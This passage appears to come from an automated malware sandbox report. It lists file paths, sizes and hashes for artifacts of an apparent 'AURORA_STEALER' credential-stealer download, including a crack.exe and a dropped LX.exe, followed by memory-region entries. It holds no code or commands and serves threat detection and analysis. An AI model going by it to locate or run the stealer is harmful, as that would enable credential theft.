                                              1ab3092297d1806397e8d3a6747a3271

                                              SHA1

                                              ea114a2e5ddee915d30458031ec5ced7f97d1650

                                              SHA256

                                              2aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e

                                              SHA512

                                              1ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28

                                            • C:\Users\Admin\AppData\Local\Temp\LX.exe

                                              Filesize

                                              74KB

                                              MD5

                                              1ab3092297d1806397e8d3a6747a3271

                                              SHA1

                                              ea114a2e5ddee915d30458031ec5ced7f97d1650

                                              SHA256

                                              2aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e

                                              SHA512

                                              1ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28

                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ekkvghd1.edh.ps1

                                              Filesize

                                              60B

                                              MD5

                                              d17fe0a3f47be24a6453e9ef58c94641

                                              SHA1

                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                              SHA256

                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                              SHA512

                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                            • C:\Users\Admin\AppData\Local\Temp\scoped_dir4816_1465925653\CRX_INSTALL\_locales\en_CA\messages.json

                                              Filesize

                                              711B

                                              MD5

                                              558659936250e03cc14b60ebf648aa09

                                              SHA1

                                              32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

                                              SHA256

                                              2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

                                              SHA512

                                              1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

                                            • C:\Users\Admin\AppData\Local\Temp\scoped_dir4816_1465925653\c03b7dd0-b9dd-4db5-91c3-b2d396ae9817.tmp

                                              Filesize

                                              88KB

                                              MD5

                                              2cc86b681f2cd1d9f095584fd3153a61

                                              SHA1

                                              2a0ac7262fb88908a453bc125c5c3fc72b8d490e

                                              SHA256

                                              d412fbbeb84e2a6882b2f0267b058f2ceb97f501e440fe3f9f70fac5c2277b9c

                                              SHA512

                                              14ba32c3cd5b1faf100d06f78981deebbbb673299a355b6eaec88e6cb5543725242c850235a541afa8abba4a609bb2ec26e4a0526c6b198016b08d8af868b986

                                            • C:\Users\Admin\Downloads\AURORA_STEALER.rar

                                              Filesize

                                              11.2MB

                                              MD5

                                              456c97b25ed197734c568cebf9136cda

                                              SHA1

                                              ebfa2486cf3a4d8a85d2f84c681299cd2d23d9ab

                                              SHA256

                                              bfae184d9a7b9bf26333c277a8a73e9e21d193bdcfc10e1cf737a8fcc877ef3d

                                              SHA512

                                              6b5e2918bec08d1cef80e115579a24c2f99b7b0a31a4b2f1427b0ea01cd1c7ae1abfd33363447f75a42687271cb523926c77895b7842c71fa1f41eb8e66b6678

                                            • C:\Users\Admin\Downloads\AURORA_STEALER.rar.crdownload

                                              Filesize

                                              11.2MB

                                              MD5

                                              456c97b25ed197734c568cebf9136cda

                                              SHA1

                                              ebfa2486cf3a4d8a85d2f84c681299cd2d23d9ab

                                              SHA256

                                              bfae184d9a7b9bf26333c277a8a73e9e21d193bdcfc10e1cf737a8fcc877ef3d

                                              SHA512

                                              6b5e2918bec08d1cef80e115579a24c2f99b7b0a31a4b2f1427b0ea01cd1c7ae1abfd33363447f75a42687271cb523926c77895b7842c71fa1f41eb8e66b6678

                                            • C:\Users\Admin\Downloads\AURORA_STEALER\AURORA_STEALER.exe

                                              Filesize

                                              11.1MB

                                              MD5

                                              b4863ea5e21b52e6bb199de51671aa88

                                              SHA1

                                              116b995556ef787c4b653999bf4ccf9cafa593a3

                                              SHA256

                                              c39eeb965f63cf236d5458c8cecdd7c847e5d0aa56a2fb8009fb8ca6b8ebb046

                                              SHA512

                                              5a5e7888512b0319092f39fcd139d3a75ced9fa6de7479d4a69f745bb8914f7173c4da664296c301e3654389f951b6acf9084db50f22ab30e482f20b0a6223f5

                                            • C:\Users\Admin\Downloads\AURORA_STEALER\Aurora.exe

                                              Filesize

                                              25.5MB

                                              MD5

                                              ee0a49caa656fe8693ffec78e69e864d

                                              SHA1

                                              dca409540b8c19a31e0748a17425835358a90e1b

                                              SHA256

                                              34e038a53f367feda9eb1ffbf71ca6af8ac9ace7a34d86c43e1f197c8988057f

                                              SHA512

                                              897be9ce27bec144b34cdfc4ef94cd95c2cb58a50e4679f9c3a2fa2df42c0a9dea80b4fcb7fb4fd037278cab427abaaae553e1939bff83868e15fffd3fdf3aa1

                                            • C:\Users\Admin\Downloads\AURORA_STEALER\Aurora.exe

                                              Filesize

                                              25.5MB

                                              MD5

                                              ee0a49caa656fe8693ffec78e69e864d

                                              SHA1

                                              dca409540b8c19a31e0748a17425835358a90e1b

                                              SHA256

                                              34e038a53f367feda9eb1ffbf71ca6af8ac9ace7a34d86c43e1f197c8988057f

                                              SHA512

                                              897be9ce27bec144b34cdfc4ef94cd95c2cb58a50e4679f9c3a2fa2df42c0a9dea80b4fcb7fb4fd037278cab427abaaae553e1939bff83868e15fffd3fdf3aa1

                                            • C:\Users\Admin\Downloads\AURORA_STEALER\crack.exe

                                              Filesize

                                              18KB

                                              MD5

                                              b441b71b1ce23257d6f40bd7555703ac

                                              SHA1

                                              961d3ae7e69b7a39edda340e93986c5a7f89c097

                                              SHA256

                                              eeaacd0b7e68cc5e5a183dc5f6e8b489cf267a73ebd772b338873f9e04e2b7a4

                                              SHA512

                                              e4f67e81e8f83b211a8c4bbaa0ff96d02341ff3fe6a83ffac0aefb62507afb0fa823fe43e3d4e3dd0b4a680393e6980adc92cea5286998109c828faf657c4a8b

                                            • memory/1588-1881-0x0000000000400000-0x0000000001D8A000-memory.dmp

                                              Filesize

                                              25.5MB

                                            • memory/2596-1912-0x000001B59C7D0000-0x000001B59C7E0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/2596-1914-0x000001B59C7D0000-0x000001B59C7E0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/2596-1915-0x000001B59C7D0000-0x000001B59C7E0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3404-1913-0x00007FF729890000-0x00007FF72B19B000-memory.dmp

                                              Filesize

                                              25.0MB

                                            • memory/3760-1882-0x0000000000AA0000-0x0000000000AB8000-memory.dmp

                                              Filesize

                                              96KB

                                            • memory/4340-1894-0x000001F333870000-0x000001F333892000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/4340-1896-0x000001F3336F0000-0x000001F333700000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4340-1895-0x000001F3336F0000-0x000001F333700000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4340-1897-0x000001F3336F0000-0x000001F333700000-memory.dmp

                                              Filesize

                                              64KB